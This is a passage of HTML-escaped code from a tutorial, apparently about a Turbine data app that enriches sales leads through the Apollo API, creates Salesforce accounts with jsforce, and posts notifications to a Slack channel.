                    &lt;span class=&quot;token string-property property&quot;&gt;&quot;Content-Type&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;application/json&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                    &lt;span class=&quot;token string-property property&quot;&gt;&quot;Cache-Control&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;no-cache&quot;&lt;/span&gt;
                &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token literal-property property&quot;&gt;data&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                    &lt;span class=&quot;token string-property property&quot;&gt;&quot;api_key&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;APOLLO_API_KEY&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                    &lt;span class=&quot;token string-property property&quot;&gt;&quot;q_organization_domains&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; companyUrl&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                    &lt;span class=&quot;token string-property property&quot;&gt;&quot;person_titles&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; `&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;$&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;jobTitle&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&apos;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
                &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
        	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;catch&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;error&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;error&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; response&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Sending Leads to Salesforce&lt;/h3&gt;
&lt;p&gt;Now that we have all of our data we can send it to Salesforce via their API. While we do have a &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-salesforce&quot;&gt;Salesforce connector available via Conduit&lt;/a&gt;, I wanted to showcase Turbine’s ability to leverage both the Meroxa platform and regular code for data movement. To send data into Salesforce, I will use the &lt;a href=&quot;https://jsforce.github.io/&quot;&gt;jsforce Node.js library&lt;/a&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; jsforce &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;require&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;jsforce&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;sendToSalesforce&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;companyInfo&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; conn &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;new&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;jsforce&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Connection&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token literal-property property&quot;&gt;instanceUrl&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;SFDC_URL&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token literal-property property&quot;&gt;accessToken&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;SFDC_ACCESS_TOKEN&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;try&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; conn&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;subject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Account&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;create&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;Name&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;$companyInfo.name&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// add whatever fields you want here&lt;/span&gt;
            &lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;err&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; ret&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;err &lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;ret&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;success&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;err&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; ret&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
                console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Created record id : &quot;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;+&lt;/span&gt; ret&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;catch&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;error&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;error&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Notifying the Sales Team in Slack&lt;/h3&gt;
&lt;p&gt;Once a new lead is in Salesforce, we want to notify the sales team in their Slack channel so they can begin outreach. You’ll need to get a token from the Slack settings and in this case I’m using a &lt;a href=&quot;https://api.slack.com/authentication/token-types#bot&quot;&gt;bot user token&lt;/a&gt; so I can post as the Prospected app. If I want to format the message, I could include a blocks object&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;sendSlackNotification&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;companyInfo&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; slackToken &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;SLACK_BOT_USER_TOKEN&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;catch&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;err&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;err&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    
    &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; url &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;https://slack.com/api/chat.postMessage&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; res &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; axios&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;post&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;url&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                &lt;span class=&quot;token literal-property property&quot;&gt;channel&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;#sales&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token literal-property property&quot;&gt;icon_emoji&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;:moneybag:&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token literal-property property&quot;&gt;username&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;Prospector&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token literal-property property&quot;&gt;text&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;New Contact: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;companyInfo&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;
        	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;headers&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;authorization&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;Bearer &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;slackToken&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; 
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    	console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;Done&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; res&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Completing the Turbine Data App&lt;/h3&gt;
&lt;p&gt;Now that we have all the functions completed, the last step is to wire this up to orchestrate the data. We added a PostgreSQL resource as seen below for future analysis or to power a more full-featured dashboard.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;// Import statements&lt;/span&gt;
&lt;span class=&quot;token comment&quot;&gt;// Main app code&lt;/span&gt;
exports&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;App &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;App&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token function&quot;&gt;digForGold&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;csvFiles&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		csvFiles&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;forEach&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;csv&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		fs&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;createReadStream&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;csvLocation&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
			&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;pipe&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;csv&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;headers&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;skipLines&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;on&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;error&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;error&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;on&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;data&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;data&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;makeRequest&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;on&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;end&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
            	console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;done&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    
    &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;makeRequest&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;data&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; companyUrl &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; data&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;_10&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; company &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;cleanURL&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;companyUrl&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; plResults &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;makePLRequest&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;companyUrl&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; contactInfo &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;findIcpAtCompany&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;companyUrl&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; sfdcResponse &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;sendToSalesforce&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;contactInfo&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; slackResponse &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;sendSlackNotifcation&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;contactInfo&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;turbine&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;s3&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
